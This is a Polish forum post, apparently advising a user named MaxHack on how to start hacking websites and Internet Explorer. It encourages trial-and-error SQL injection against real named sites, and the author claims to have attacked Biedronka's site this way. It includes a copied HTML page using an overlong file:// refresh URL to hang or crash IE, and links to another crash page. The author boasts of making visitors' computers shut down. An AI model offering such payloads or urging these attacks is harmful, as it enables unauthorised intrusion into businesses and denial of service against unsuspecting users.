Drogi MaxHack...
Jak chcesz to robić to obserwuj inne błędy...
Przydałaby się wiedza na temat: HTML, PHP, MySQL
1. Np. na Allegro brak cudzysłowów w adresach daje możliwości, które potem możemy dalej badać...
2. Na niektórych CMS-ach czy stronach dane wprowadzone w adres - np. http://www.jakistamadres.com/blad.ph...KEDHACKEHACKED wywoła wyświetlenie dowolnego tekstu
3. SQLInjection - dla początkujących - metoda prób i błędów - np. mam zapisane jak na stronie Biedronki wykonałem atak SQLInjection i wyskoczyło kilka przydatnych informacji
4. Błędy w IE Jak tkoś używa IE to jego sprawa... Ale to kwestia 5 minut i 10 linijek kody, aby wykryć dzirę typu "Stack Overflow", zawiechy IE czy wyłączenie komuś kompa... Ciekawy jest efekt - odwiedzasz strone a nagle wyłącza Ci się komp
Może potem Ci zapodam kilka skryptów (czysty HTML) na IE
Tutaj masz prosty skopiowany z hackme bo to na początek wystarczy:
Kod html:
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=file://test/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA5Z̬AAAAAAAAAAAAAAAAAAAAAAACCCCCSSSŞ- #§¬HP+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /">
<HTML>Thx for using Internet Explorer 5.0</HTML>
zapisz to sobie jako zawiecha.html i odpal pod IE... Efekt taki sobie...
Potem dam coś lepszego... To nie jest jeszcze exploit, ale kombinując z tym możesz dokonać w przyszłości wiele
Jeszcze dam Ci linka do mojej ulubionej chodź niezwykle prostej: http://1tbzs6sjz.yoyo.pl/crash-ie.html
Pozdrawiam